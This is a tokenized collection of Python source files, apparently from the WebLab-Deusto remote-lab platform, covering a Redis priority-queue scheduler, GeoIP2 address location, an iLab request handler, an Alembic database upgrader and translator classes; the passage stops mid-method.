reservation_id_with_route , position ) <EOL> else : <EOL> return WSS . WaitingInstancesQueueStatus ( reservation_id_with_route , position ) <EOL> @ exc_checker <EOL> @ logged ( ) <EOL> @ Override ( Scheduler ) <EOL> def confirm_experiment ( self , reservation_id , lab_session_id , initial_configuration , exp_info ) : <EOL> self . _remove_expired_reservations ( ) <EOL> weblab_reservation_pqueue = WEBLAB_RESOURCE_RESERVATION_PQUEUE % ( self . resource_type_name , reservation_id ) <EOL> client = self . redis_maker ( ) <EOL> pqueue_reservation_data_str = client . get ( weblab_reservation_pqueue ) <EOL> if pqueue_reservation_data_str is None : <EOL> return <EOL> pqueue_reservation_data = json . loads ( pqueue_reservation_data_str ) <EOL> resource_instance_str = pqueue_reservation_data . get ( RESOURCE_INSTANCE ) <EOL> if resource_instance_str is not None : <EOL> resource_instance = Resource . parse ( resource_instance_str ) <EOL> if not self . resources_manager . check_working ( resource_instance ) : <EOL> return <EOL> pqueue_reservation_data [ LAB_SESSION_ID ] = lab_session_id . id <EOL> pqueue_reservation_data [ INITIAL_CONFIGURATION ] = initial_configuration <EOL> pqueue_reservation_data [ TIMESTAMP_AFTER ] = self . time_provider . get_time ( ) <EOL> pqueue_reservation_data [ ACTIVE_STATUS ] = STATUS_RESERVED <EOL> pqueue_reservation_data [ EXP_INFO ] = json . dumps ( exp_info ) <EOL> pqueue_reservation_data_str = json . dumps ( pqueue_reservation_data ) <EOL> client . set ( weblab_reservation_pqueue , pqueue_reservation_data_str ) <EOL> @ exc_checker <EOL> @ logged ( ) <EOL> @ Override ( Scheduler ) <EOL> def finish_reservation ( self , reservation_id ) : <EOL> self . _remove_expired_reservations ( ) <EOL> weblab_reservation_pqueue = WEBLAB_RESOURCE_RESERVATION_PQUEUE % ( self . resource_type_name , reservation_id ) <EOL> client = self . redis_maker ( ) <EOL> pqueue_reservation_data_str = client . get ( weblab_reservation_pqueue ) <EOL> if pqueue_reservation_data_str is None : <EOL> return <EOL> pqueue_reservation_data = json . loads ( pqueue_reservation_data_str ) <EOL> if ACTIVE_STATUS in pqueue_reservation_data : <EOL> enqueue_free_experiment_args = self . _clean_current_reservation ( reservation_id ) <EOL> else : <EOL> enqueue_free_experiment_args = None <EOL> self . _delete_reservation ( reservation_id ) <EOL> if enqueue_free_experiment_args is not None : <EOL> self . confirmer . enqueue_free_experiment ( * enqueue_free_experiment_args ) <EOL> def _clean_current_reservation ( self , reservation_id ) : <EOL> client = self . redis_maker ( ) <EOL> enqueue_free_experiment_args = None <EOL> if reservation_id is not None : <EOL> weblab_reservation_pqueue = WEBLAB_RESOURCE_RESERVATION_PQUEUE % ( self . resource_type_name , reservation_id ) <EOL> reservation_data_str = client . get ( weblab_reservation_pqueue ) <EOL> if reservation_data_str is not None : <EOL> downgraded = self . reservations_manager . downgrade_confirmation ( reservation_id ) <EOL> if downgraded : <EOL> reservation_data = json . loads ( reservation_data_str ) <EOL> resource_instance_str = reservation_data . get ( RESOURCE_INSTANCE ) <EOL> if resource_instance_str is not None : <EOL> resource_instance = Resource . parse ( resource_instance_str ) <EOL> weblab_resource_pqueue_instance_reservations = WEBLAB_RESOURCE_PQUEUE_INSTANCE_RESERVATIONS % ( resource_instance . resource_type , resource_instance . resource_instance ) <EOL> client . srem ( weblab_resource_pqueue_instance_reservations , reservation_id ) <EOL> lab_session_id = reservation_data . get ( LAB_SESSION_ID ) <EOL> experiment_instance_str = reservation_data . get ( EXPERIMENT_INSTANCE ) <EOL> experiment_instance_id = ExperimentInstanceId . parse ( experiment_instance_str ) <EOL> if experiment_instance_id is not None : <EOL> lab_coord_address = reservation_data . get ( LAB_COORD ) <EOL> enqueue_free_experiment_args = ( lab_coord_address , reservation_id , lab_session_id , experiment_instance_id ) <EOL> return enqueue_free_experiment_args <EOL> def update ( self ) : <EOL> self . _update_queues ( ) <EOL> @ exc_checker <EOL> def _update_queues ( self ) : <EOL> previously_waiting_reservation_ids = [ ] <EOL> weblab_resource_pqueue_map = WEBLAB_RESOURCE_PQUEUE_MAP % self . resource_type_name <EOL> weblab_resource_pqueue_sorted = WEBLAB_RESOURCE_PQUEUE_SORTED % self . resource_type_name <EOL> weblab_resource_slots = WEBLAB_RESOURCE_SLOTS % self . resource_type_name <EOL> while True : <EOL> client = self . redis_maker ( ) <EOL> filled_waiting_reservation_ids = client . zrangebyscore ( weblab_resource_pqueue_sorted , - <NUM_LIT> , + <NUM_LIT> , start = <NUM_LIT:0> , num = len ( previously_waiting_reservation_ids ) + <NUM_LIT:1> ) <EOL> first_waiting_reservation_id = None <EOL> for filled_waiting_reservation_id in filled_waiting_reservation_ids : <EOL> waiting_reservation_id = filled_waiting_reservation_id [ filled_waiting_reservation_id . find ( '<STR_LIT:_>' ) + <NUM_LIT:1> : ] <EOL> if waiting_reservation_id not in previously_waiting_reservation_ids : <EOL> first_waiting_reservation_id = waiting_reservation_id <EOL> break <EOL> if first_waiting_reservation_id is None : <EOL> return <EOL> previously_waiting_reservation_ids . append ( first_waiting_reservation_id ) <EOL> free_instances = [ Resource ( self . resource_type_name , resource_instance ) <EOL> for resource_instance in client . smembers ( weblab_resource_slots ) ] <EOL> if len ( free_instances ) == <NUM_LIT:0> : <EOL> return <EOL> if self . randomize_instances : <EOL> randomized_free_instances = [ free_instance for free_instance in free_instances ] <EOL> random . shuffle ( randomized_free_instances ) <EOL> else : <EOL> randomized_free_instances = sorted ( free_instances , cmp = lambda r1 , r2 : cmp ( r1 . resource_type , r2 . resource_type ) or cmp ( r1 . resource_instance , r2 . resource_instance ) ) <EOL> for free_instance in randomized_free_instances : <EOL> working = self . resources_manager . check_working ( free_instance ) <EOL> if not working : <EOL> continue <EOL> confirmed = self . reservations_manager . confirm ( first_waiting_reservation_id ) <EOL> if not confirmed : <EOL> break <EOL> acquired = self . resources_manager . acquire_resource ( free_instance ) <EOL> if not acquired : <EOL> self . reservations_manager . downgrade_confirmation ( first_waiting_reservation_id ) <EOL> continue <EOL> weblab_resource_pqueue_instance_reservations = WEBLAB_RESOURCE_PQUEUE_INSTANCE_RESERVATIONS % ( self . resource_type_name , free_instance . resource_instance ) <EOL> client . sadd ( weblab_resource_pqueue_instance_reservations , first_waiting_reservation_id ) <EOL> weblab_reservation_pqueue = WEBLAB_RESOURCE_RESERVATION_PQUEUE % ( self . resource_type_name , first_waiting_reservation_id ) <EOL> pqueue_reservation_data_str = client . get ( weblab_reservation_pqueue ) <EOL> reservation_data = self . reservations_manager . get_reservation_data ( first_waiting_reservation_id ) <EOL> if pqueue_reservation_data_str is None or reservation_data is None : <EOL> self . resources_manager . release_resource ( free_instance ) <EOL> client . srem ( weblab_resource_pqueue_instance_reservations , first_waiting_reservation_id ) <EOL> break <EOL> pqueue_reservation_data = json . loads ( pqueue_reservation_data_str ) <EOL> start_time = self . time_provider . get_time ( ) <EOL> total_time = pqueue_reservation_data [ TIME ] <EOL> pqueue_reservation_data [ START_TIME ] = start_time <EOL> pqueue_reservation_data [ TIMESTAMP_BEFORE ] = start_time <EOL> pqueue_reservation_data [ ACTIVE_STATUS ] = STATUS_WAITING_CONFIRMATION <EOL> pqueue_reservation_data [ RESOURCE_INSTANCE ] = free_instance . to_weblab_str ( ) <EOL> initialization_in_accounting = pqueue_reservation_data [ INITIALIZATION_IN_ACCOUNTING ] <EOL> client_initial_data = reservation_data [ CLIENT_INITIAL_DATA ] <EOL> request_info = json . loads ( reservation_data [ REQUEST_INFO ] ) <EOL> username = request_info . get ( '<STR_LIT:username>' ) <EOL> locale = request_info . get ( '<STR_LIT>' ) <EOL> requested_experiment_type = ExperimentId . parse ( reservation_data [ EXPERIMENT_TYPE ] ) <EOL> selected_experiment_instance = None <EOL> experiment_instances = self . resources_manager . list_experiment_instance_ids_by_resource ( free_instance ) <EOL> for experiment_instance in experiment_instances : <EOL> if experiment_instance . to_experiment_id ( ) == requested_experiment_type : <EOL> selected_experiment_instance = experiment_instance <EOL> if selected_experiment_instance is None : <EOL> self . reservations_manager . downgrade_confirmation ( first_waiting_reservation_id ) <EOL> self . resources_manager . release_resource ( free_instance ) <EOL> client . srem ( weblab_resource_pqueue_instance_reservations , first_waiting_reservation_id ) <EOL> continue <EOL> pqueue_reservation_data [ EXPERIMENT_INSTANCE ] = selected_experiment_instance . to_weblab_str ( ) <EOL> laboratory_coord_address = self . resources_manager . get_laboratory_coordaddress_by_experiment_instance_id ( selected_experiment_instance ) <EOL> pqueue_reservation_data [ LAB_COORD ] = laboratory_coord_address <EOL> client . set ( weblab_reservation_pqueue , json . dumps ( pqueue_reservation_data ) ) <EOL> filled_reservation_id = client . hget ( weblab_resource_pqueue_map , first_waiting_reservation_id ) <EOL> client . zrem ( weblab_resource_pqueue_sorted , filled_reservation_id ) <EOL> deserialized_server_initial_data = { <EOL> '<STR_LIT>' : '<STR_LIT:%s>' % total_time , <EOL> '<STR_LIT>' : '<STR_LIT:%s>' % datetime . datetime . fromtimestamp ( start_time ) , <EOL> '<STR_LIT>' : initialization_in_accounting , <EOL> '<STR_LIT>' : selected_experiment_instance . exp_name , <EOL> '<STR_LIT>' : selected_experiment_instance . cat_name , <EOL> '<STR_LIT>' : username , <EOL> '<STR_LIT>' : username , <EOL> '<STR_LIT>' : locale , <EOL> } <EOL> server_initial_data = json . dumps ( deserialized_server_initial_data ) <EOL> self . confirmer . enqueue_confirmation ( laboratory_coord_address , first_waiting_reservation_id , selected_experiment_instance , client_initial_data , server_initial_data , self . resource_type_name ) <EOL> break <EOL> @ exc_checker <EOL> def _remove_expired_reservations ( self ) : <EOL> now = self . time_provider . get_time ( ) <EOL> enqueue_free_experiment_args_retrieved = [ ] <EOL> client = self . redis_maker ( ) <EOL> weblab_resource_pqueue_reservations = WEBLAB_RESOURCE_PQUEUE_RESERVATIONS % self . resource_type_name <EOL> reservations = [ reservation_id for reservation_id in client . smembers ( weblab_resource_pqueue_reservations ) ] <EOL> pipeline = client . pipeline ( ) <EOL> for reservation_id in reservations : <EOL> weblab_reservation_pqueue = WEBLAB_RESOURCE_RESERVATION_PQUEUE % ( self . resource_type_name , reservation_id ) <EOL> pipeline . get ( weblab_reservation_pqueue ) <EOL> results = pipeline . execute ( ) <EOL> for reservation_id , reservation_data in zip ( reservations , results ) : <EOL> if reservation_data is not None : <EOL> data = json . loads ( reservation_data ) <EOL> if ACTIVE_STATUS in data : <EOL> total_time = data [ TIME ] <EOL> timestamp_before = data [ TIMESTAMP_BEFORE ] <EOL> timestamp_after = data . get ( TIMESTAMP_AFTER ) <EOL> initialization_in_accounting = data [ INITIALIZATION_IN_ACCOUNTING ] <EOL> if timestamp_after is not None or initialization_in_accounting : <EOL> timestamp = timestamp_before if initialization_in_accounting else timestamp_after <EOL> if now >= timestamp + total_time : <EOL> enqueue_free_experiment_args = self . _clean_current_reservation ( reservation_id ) <EOL> enqueue_free_experiment_args_retrieved . append ( enqueue_free_experiment_args ) <EOL> self . _delete_reservation ( reservation_id ) <EOL> self . reservations_manager . delete ( reservation_id ) <EOL> current_expiration_time = datetime . datetime . utcfromtimestamp ( now - EXPIRATION_TIME ) <EOL> for expired_reservation_id in self . reservations_manager . list_expired_reservations ( current_expiration_time ) : <EOL> weblab_reservation_pqueue = WEBLAB_RESOURCE_RESERVATION_PQUEUE % ( self . resource_type_name , expired_reservation_id ) <EOL> pqueue_reservation_data_str = client . get ( weblab_reservation_pqueue ) <EOL> if pqueue_reservation_data_str is None : <EOL> continue <EOL> pqueue_reservation_data = json . loads ( pqueue_reservation_data_str ) <EOL> if ACTIVE_STATUS in pqueue_reservation_data : <EOL> enqueue_free_experiment_args = self . _clean_current_reservation ( expired_reservation_id ) <EOL> enqueue_free_experiment_args_retrieved . append ( enqueue_free_experiment_args ) <EOL> self . _delete_reservation ( expired_reservation_id ) <EOL> self . reservations_manager . delete ( expired_reservation_id ) <EOL> for enqueue_free_experiment_args in enqueue_free_experiment_args_retrieved : <EOL> if enqueue_free_experiment_args is not None : <EOL> self . confirmer . enqueue_free_experiment ( * enqueue_free_experiment_args ) <EOL> def _delete_reservation ( self , reservation_id ) : <EOL> weblab_resource_pqueue_reservations = WEBLAB_RESOURCE_PQUEUE_RESERVATIONS % self . resource_type_name <EOL> weblab_resource_pqueue_map = WEBLAB_RESOURCE_PQUEUE_MAP % self . resource_type_name <EOL> weblab_resource_pqueue_sorted = WEBLAB_RESOURCE_PQUEUE_SORTED % self . resource_type_name <EOL> weblab_reservation_pqueue = WEBLAB_RESOURCE_RESERVATION_PQUEUE % ( self . resource_type_name , reservation_id ) <EOL> resource_instances = self . resources_manager . list_resource_instances_by_type ( self . resource_type_name ) <EOL> client = self . redis_maker ( ) <EOL> pipeline = client . pipeline ( ) <EOL> for resource_instance in resource_instances : <EOL> weblab_resource_pqueue_instance_reservations = WEBLAB_RESOURCE_PQUEUE_INSTANCE_RESERVATIONS % ( self . resource_type_name , resource_instance . resource_instance ) <EOL> pipeline . srem ( weblab_resource_pqueue_instance_reservations , reservation_id ) <EOL> pipeline . srem ( weblab_resource_pqueue_reservations , reservation_id ) <EOL> pipeline . delete ( weblab_reservation_pqueue ) <EOL> pipeline . execute ( ) <EOL> filled_reservation_id = client . hget ( weblab_resource_pqueue_map , reservation_id ) <EOL> client . hdel ( weblab_resource_pqueue_map , reservation_id ) <EOL> client . zrem ( weblab_resource_pqueue_sorted , filled_reservation_id ) <EOL> @ Override ( Scheduler ) <EOL> def _clean ( self ) : <EOL> client = self . redis_maker ( ) <EOL> for reservation_id in self . reservations_manager . list_all_reservations ( ) : <EOL> client . delete ( WEBLAB_RESOURCE_RESERVATION_PQUEUE % ( self . resource_type_name , reservation_id ) ) <EOL> client . delete ( WEBLAB_RESOURCE_PQUEUE_INSTANCE_RESERVATIONS % ( self . resource_type_name , '<STR_LIT:*>' ) ) <EOL> for resource_instance in self . resources_manager . list_resource_instances_by_type ( self . resource_type_name ) : <EOL> client . delete ( WEBLAB_RESOURCE_PQUEUE_INSTANCE_RESERVATIONS % ( self . resource_type_name , resource_instance . resource_instance ) ) <EOL> client . delete ( WEBLAB_RESOURCE_PQUEUE_RESERVATIONS % self . resource_type_name ) <EOL> client . delete ( WEBLAB_RESOURCE_PQUEUE_POSITIONS % self . resource_type_name ) <EOL> client . delete ( WEBLAB_RESOURCE_PQUEUE_MAP % self . resource_type_name ) <EOL> client . delete ( WEBLAB_RESOURCE_PQUEUE_SORTED % self . resource_type_name ) </s>
<s> from __future__ import print_function , unicode_literals <EOL> import os <EOL> import time <EOL> import socket <EOL> import requests <EOL> import threading <EOL> import traceback <EOL> from geoip2 . errors import GeoIP2Error <EOL> from geoip2 . database import Reader as GeoIP2Reader <EOL> from voodoo . resources_manager import is_testing <EOL> import weblab . configuration_doc as configuration_doc <EOL> def is_private ( ip_address ) : <EOL> if ip_address . startswith ( '<STR_LIT>' ) : <EOL> return True <EOL> if ip_address . startswith ( '<STR_LIT>' ) : <EOL> return True <EOL> if ip_address . startswith ( '<STR_LIT>' ) : <EOL> return True <EOL> if ip_address . startswith ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> return True <EOL> return False <EOL> class AddressLocator ( object ) : <EOL> def __init__ ( self , config , local_city , local_country ) : <EOL> self . config = config <EOL> self . local_city = local_city <EOL> self . local_country = local_country <EOL> def locate ( self , ip_address ) : <EOL> if ip_address . startswith ( "<STR_LIT>" ) and ip_address . endswith ( "<STR_LIT:>>" ) : <EOL> ip_address = ip_address [ len ( "<STR_LIT>" ) : - <NUM_LIT:1> ] <EOL> if ip_address == '<STR_LIT>' or ip_address == '<STR_LIT>' or '<STR_LIT>' in ip_address : <EOL> return { <EOL> '<STR_LIT>' : ip_address , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None <EOL> } <EOL> if '<STR_LIT:U+002CU+0020>' in ip_address : <EOL> ip_address = [ x . strip ( ) for x in ip_address . split ( '<STR_LIT:U+002C>' ) ] [ - <NUM_LIT:1> ] <EOL> try : <EOL> resolved = socket . gethostbyaddr ( ip_address ) [ <NUM_LIT:0> ] <EOL> except Exception : <EOL> if is_private ( ip_address ) : <EOL> resolved = "<STR_LIT>" <EOL> else : <EOL> resolved = ip_address <EOL> city = country = most_specific_subdivision = None <EOL> if is_private ( ip_address ) : <EOL> country = self . local_country <EOL> city = self . local_city <EOL> if country is None : <EOL> geoip2_city_filepath = self . config [ configuration_doc . CORE_GEOIP2_CITY_FILEPATH ] <EOL> if geoip2_city_filepath and os . path . exists ( geoip2_city_filepath ) : <EOL> try : <EOL> reader = GeoIP2Reader ( geoip2_city_filepath ) <EOL> city_results = reader . city ( ip_address ) <EOL> if city_results : <EOL> if city_results . country and city_results . country . iso_code : <EOL> country = city_results . country . iso_code <EOL> if city_results . city and city_results . city . name : <EOL> city = city_results . city . name <EOL> if city_results . subdivisions and city_results . subdivisions . most_specific and city_results . subdivisions . most_specific . name : <EOL> most_specific_subdivision = city_results . subdivisions . most_specific . name <EOL> except GeoIP2Error : <EOL> pass <EOL> if country is None : <EOL> geoip2_country_filepath = self . config [ configuration_doc . CORE_GEOIP2_COUNTRY_FILEPATH ] <EOL> if geoip2_country_filepath and os . path . exists ( geoip2_country_filepath ) : <EOL> try : <EOL> reader = GeoIP2Reader ( geoip2_country_filepath ) <EOL> country_results = reader . country ( ip_address ) <EOL> if country_results : <EOL> if country_results . country and country_results . country . iso_code : <EOL> country = city_results . country . iso_code <EOL> except GeoIP2Error : <EOL> pass <EOL> return { <EOL> '<STR_LIT>' : resolved , <EOL> '<STR_LIT>' : city , <EOL> '<STR_LIT>' : country , <EOL> '<STR_LIT>' : most_specific_subdivision <EOL> } <EOL> class LocationRetriever ( threading . Thread ) : <EOL> SECONDS = <NUM_LIT:15> <EOL> def __init__ ( self , config , db ) : <EOL> threading . Thread . __init__ ( self ) <EOL> self . config = config <EOL> self . db = db <EOL> self . setDaemon ( True ) <EOL> self . stopping = False <EOL> self . local_country = config [ configuration_doc . CORE_LOCAL_COUNTRY ] <EOL> self . local_city = config [ configuration_doc . CORE_LOCAL_CITY ] <EOL> geoip2_city_filepath = self . config [ configuration_doc . CORE_GEOIP2_CITY_FILEPATH ] <EOL> if not os . path . exists ( geoip2_city_filepath or '<STR_LIT>' ) : <EOL> if not is_testing ( ) and not config [ configuration_doc . CORE_IGNORE_LOCATIONS ] : <EOL> local_directory = os . path . abspath ( "<STR_LIT:.>" ) <EOL> if "<STR_LIT:U+0020>" in local_directory : <EOL> local_directory = '<STR_LIT>' . format ( local_directory ) <EOL> print ( "<STR_LIT>" . format ( filepath = geoip2_city_filepath , directory = local_directory ) ) <EOL> else : <EOL> if self . local_country is None or self . local_city is None : <EOL> try : <EOL> local_public_ip_address = requests . get ( "<STR_LIT>" ) . json ( ) [ '<STR_LIT>' ] <EOL> except Exception as e : <EOL> local_public_ip_address = None <EOL> if local_public_ip_address is None : <EOL> try : <EOL> local_public_ip_address = requests . get ( "<STR_LIT>" ) . json ( ) [ '<STR_LIT>' ] <EOL> except Exception as e : <EOL> local_public_ip_address = None <EOL> if local_public_ip_address is not None : <EOL> try : <EOL> reader = GeoIP2Reader ( geoip2_city_filepath ) <EOL> if self . local_country is None : <EOL> self . local_country = reader . city ( local_public_ip_address ) . country . iso_code <EOL> if self . local_city is None : <EOL> self . local_city = reader . city ( local_public_ip_address ) . city . name <EOL> except Exception : <EOL> print ( "<STR_LIT>" . format ( local_public_ip_address ) ) <EOL> traceback . print_exc ( ) <EOL> self . locator = AddressLocator ( config , local_country = self . local_country , local_city = self . local_city ) <EOL> def stop ( self ) : <EOL> self . stopping = True <EOL> def sleepStep ( self ) : <EOL> STEP = <NUM_LIT:0.1> <EOL> for _ in xrange ( int ( self . SECONDS / STEP ) ) : <EOL> if self . stopping : <EOL> break <EOL> time . sleep ( STEP ) <EOL> def run ( self ) : <EOL> while not self . stopping : <EOL> try : <EOL> changes = self . db . update_locations ( self . locator . locate ) <EOL> except Exception : <EOL> traceback . print_exc ( ) <EOL> changes = <NUM_LIT:0> <EOL> if changes == <NUM_LIT:0> : <EOL> self . sleepStep ( ) </s>
<s> from __future__ import print_function , unicode_literals <EOL> from flask import request , make_response <EOL> from weblab . core . wl import weblab_api <EOL> import json <EOL> import traceback <EOL> from weblab . data . experiments import ExperimentId <EOL> from weblab . core . coordinator . clients . ilab_batch import RequestSerializer <EOL> serializer = RequestSerializer ( ) <EOL> @ weblab_api . route_web ( '<STR_LIT>' ) <EOL> def ilab ( ) : <EOL> action = request . headers . get ( '<STR_LIT>' ) <EOL> if action is None : <EOL> return "<STR_LIT>" <EOL> if weblab_api . ctx . session_id is None : <EOL> return "<STR_LIT>" <EOL> if weblab_api . ctx . reservation_id is None : <EOL> try : <EOL> reservation_id_str = weblab_api . api . get_reservation_id_by_session_id ( ) <EOL> weblab_api . ctx . reservation_id = reservation_id_str <EOL> except : <EOL> traceback . print_exc ( ) <EOL> methods = { <EOL> '<STR_LIT>' : process_GetLabConfiguration , <EOL> '<STR_LIT>' : process_Submit , <EOL> '<STR_LIT>' : process_GetExperimentStatus , <EOL> '<STR_LIT>' : process_RetrieveResult , <EOL> '<STR_LIT>' : process_SaveAnnotation , <EOL> '<STR_LIT>' : process_ListAllClientItems , <EOL> '<STR_LIT>' : process_LoadClientItem , <EOL> '<STR_LIT>' : process_SaveClientItem , <EOL> '<STR_LIT>' : process_GetExperimentInformation , <EOL> } <EOL> if not action in methods : <EOL> return "<STR_LIT>" <EOL> response = make_response ( methods [ action ] ( ) ) <EOL> response . content_type = '<STR_LIT>' <EOL> if hasattr ( weblab_api . ctx , '<STR_LIT>' ) : <EOL> for name , value in weblab_api . ctx . other_cookies : <EOL> response . set_cookie ( name , value , path = weblab_api . ctx . location ) <EOL> return response <EOL> def process_GetLabConfiguration ( self ) : <EOL> lab_server_id = serializer . parse_get_lab_configuration_request ( request . data ) <EOL> ilab_request = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> reservation_status = weblab_api . api . reserve_experiment ( ExperimentId ( lab_server_id , '<STR_LIT>' ) , json . dumps ( ilab_request ) , '<STR_LIT:{}>' ) <EOL> lab_configuration = reservation_status . initial_data <EOL> return serializer . generate_lab_configuration_response ( lab_configuration ) <EOL> def process_Submit ( self ) : <EOL> lab_server_id , experiment_specification , _ , _ = serializer . parse_submit_request ( request . data ) <EOL> ilab_request = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : experiment_specification <EOL> } <EOL> reservation_status = weblab_api . api . reserve_experiment ( ExperimentId ( lab_server_id , '<STR_LIT>' ) , json . dumps ( ilab_request ) , '<STR_LIT:{}>' ) <EOL> weblab_api . ctx . other_cookies = { '<STR_LIT>' : reservation_status . reservation_id . id } <EOL> return """<STR_LIT>""" % reservation_status . position <EOL> def process_GetExperimentStatus ( self ) : <EOL> if self . reservation_id is None : <EOL> return "<STR_LIT>" <EOL> reservation_status = weblab_api . api . get_reservation_status ( ) <EOL> if reservation_status . status == "<STR_LIT>" : <EOL> length = reservation_status . position <EOL> status = <NUM_LIT:1> <EOL> elif reservation_status . status == "<STR_LIT>" : <EOL> length = <NUM_LIT:0> <EOL> status = <NUM_LIT:2> <EOL> elif reservation_status . status == "<STR_LIT>" : <EOL> length = <NUM_LIT:0> <EOL> status = <NUM_LIT:3> <EOL> else : <EOL> raise Exception ( "<STR_LIT>" % reservation_status . status ) <EOL> return """<STR_LIT>""" % ( status , length ) <EOL> def process_RetrieveResult ( self ) : <EOL> if self . reservation_id is None : <EOL> return "<STR_LIT>" <EOL> reservation_status = weblab_api . api . get_reservation_status ( ) <EOL> try : <EOL> response = json . loads ( reservation_status . initial_data ) <EOL> except : <EOL> return "<STR_LIT>" % reservation_status . initial_data <EOL> code = response [ '<STR_LIT:code>' ] <EOL> results = response [ '<STR_LIT>' ] <EOL> xmlResults = response [ '<STR_LIT>' ] <EOL> return serializer . generate_retrieve_result_response ( code , results , xmlResults ) <EOL> def process_GetExperimentInformation ( self ) : <EOL> return """<STR_LIT>""" <EOL> def process_SaveAnnotation ( self ) : <EOL> return """<STR_LIT>""" <EOL> def process_ListAllClientItems ( self ) : <EOL> return """<STR_LIT>""" <EOL> def process_SaveClientItem ( self ) : <EOL> return """<STR_LIT>""" <EOL> def process_LoadClientItem ( self ) : <EOL> return "<STR_LIT>" </s>
<s> from __future__ import print_function , unicode_literals <EOL> import os <EOL> from alembic . script import ScriptDirectory <EOL> from alembic . config import Config <EOL> from alembic . migration import MigrationContext <EOL> from alembic import command <EOL> from sqlalchemy import create_engine <EOL> REGULAR_ALEMBIC_PATH = os . path . join ( os . path . abspath ( os . path . dirname ( __file__ ) ) , '<STR_LIT>' ) <EOL> SCHEDULING_ALEMBIC_PATH = os . path . join ( os . path . abspath ( os . path . dirname ( __file__ ) ) , '<STR_LIT>' ) <EOL> DEBUG = False <EOL> class DbUpgrader ( object ) : <EOL> def __init__ ( self , regular_url , scheduling_url ) : <EOL> self . regular_upgrader = DbRegularUpgrader ( regular_url ) <EOL> if scheduling_url is not None : <EOL> self . scheduling_upgrader = DbSchedulingUpgrader ( scheduling_url ) <EOL> else : <EOL> self . scheduling_upgrader = DbNullUpgrader ( ) <EOL> @ property <EOL> def regular_head ( self ) : <EOL> return self . regular_upgrader . head <EOL> @ property <EOL> def scheduling_head ( self ) : <EOL> return self . scheduling_upgrader . head <EOL> def check_updated ( self ) : <EOL> return self . regular_upgrader . check ( ) and self . scheduling_upgrader . check ( ) <EOL> def upgrade ( self ) : <EOL> self . regular_upgrader . upgrade ( ) <EOL> self . scheduling_upgrader . upgrade ( ) <EOL> class DbNullUpgrader ( object ) : <EOL> @ property <EOL> def head ( self ) : <EOL> return None <EOL> def check ( self ) : <EOL> return True <EOL> def upgrade ( self ) : <EOL> pass <EOL> class DbParticularUpgrader ( object ) : <EOL> alembic_path = None <EOL> def __init__ ( self , url ) : <EOL> if url . startswith ( '<STR_LIT>' ) : <EOL> try : <EOL> import MySQLdb <EOL> assert MySQLdb is not None <EOL> except ImportError : <EOL> import pymysql_sa <EOL> pymysql_sa . make_default_mysql_dialect ( ) <EOL> self . url = url <EOL> self . config = Config ( os . path . join ( self . alembic_path , "<STR_LIT>" ) ) <EOL> self . config . set_main_option ( "<STR_LIT>" , self . alembic_path ) <EOL> self . config . set_main_option ( "<STR_LIT:url>" , self . url ) <EOL> self . config . set_main_option ( "<STR_LIT>" , self . url ) <EOL> @ property <EOL> def head ( self ) : <EOL> script = ScriptDirectory . from_config ( self . config ) <EOL> return script . get_current_head ( ) <EOL> def check ( self ) : <EOL> engine = create_engine ( self . url ) <EOL> context = MigrationContext . configure ( engine ) <EOL> current_rev = context . get_current_revision ( ) <EOL> if DEBUG : <EOL> print ( "<STR_LIT>" % self . url ) <EOL> print ( "<STR_LIT>" % self . head ) <EOL> print ( "<STR_LIT>" % current_rev ) <EOL> print ( "<STR_LIT>" , current_rev == self . head ) <EOL> print ( ) <EOL> return self . head == current_rev <EOL> def upgrade ( self ) : <EOL> if not self . check ( ) : <EOL> command . upgrade ( self . config , "<STR_LIT>" ) <EOL> class DbRegularUpgrader ( DbParticularUpgrader ) : <EOL> alembic_path = REGULAR_ALEMBIC_PATH <EOL> class DbSchedulingUpgrader ( DbParticularUpgrader ) : <EOL> alembic_path = SCHEDULING_ALEMBIC_PATH </s>
<s> from __future__ import print_function , unicode_literals <EOL> import manager as VirtualMachineManager <EOL> import dummy as VirtualMachineDummy <EOL> import virtualbox as VirtualBox <EOL> def _ ( ) : <EOL> print ( VirtualMachineManager , VirtualMachineDummy , VirtualBox ) <EOL> __all__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] </s>
<s> from __future__ import print_function , unicode_literals <EOL> from voodoo import log <EOL> from voodoo . gen . caller_checker import caller_check <EOL> from voodoo . log import logged <EOL> from voodoo . override import Override <EOL> from weblab . data import server_type as ServerType <EOL> import weblab . translator . translator as translator <EOL> class StoresNothingTranslator ( translator . Translator ) : <EOL> @ Override ( translator . Translator ) <EOL> @ logged ( log . level . Info ) <EOL> @ caller_check ( ServerType . Proxy ) <EOL> def do_on_start ( self , session_id ) : <EOL> super ( StoresNothingTranslator , self ) . do_on_start ( session_id ) <EOL> @ Override ( translator . Translator ) <EOL> @ logged ( log . level . Info ) <EOL> @ caller_check ( ServerType . Proxy ) <EOL> def do_before_send_command ( self , session_id , command ) : <EOL> return None <EOL> @ Override ( translator . Translator ) <EOL> @ logged ( log . level . Info ) <EOL> @ caller_check ( ServerType . Proxy ) <EOL> def do_after_send_command ( self , session_id , response ) : <EOL> return None <EOL> @ Override ( translator . Translator ) <EOL> @ logged ( log . level . Info ) <EOL> @ caller_check ( ServerType . Proxy ) <EOL> def do_before_send_file ( self , session_id , file ) : <EOL> return None <EOL> @ Override ( translator . Translator ) <EOL> @ logged ( log . level . Info ) <EOL> @ caller_check ( ServerType . Proxy ) <EOL> def do_after_send_file ( self , session_id , response ) : <EOL> return None <EOL> @ Override ( translator . Translator ) <EOL> @ logged ( log . level . Info ) <EOL> @ caller_check ( ServerType . Proxy ) <EOL> def do_on_finish ( self , session_id ) : <EOL> super ( StoresNothingTranslator , self ) . do_on_finish ( session_id ) <EOL> class StoresEverythingTranslator ( translator . Translator ) : <EOL> @ Override ( translator . Translator ) <EOL> @ logged ( log . level . Info ) <EOL> @ caller_check ( ServerType . Proxy ) <EOL> def do_on_start ( self , session_id ) : <EOL> super ( StoresEverythingTranslator , self ) . do_on_start ( session_id ) <EOL> @ Override ( translator . Translator ) <EOL> @ logged ( log . level . Info ) <EOL> @ caller_check ( ServerType . Proxy ) <EOL> def do_before_send_command ( self , session_id , command ) : 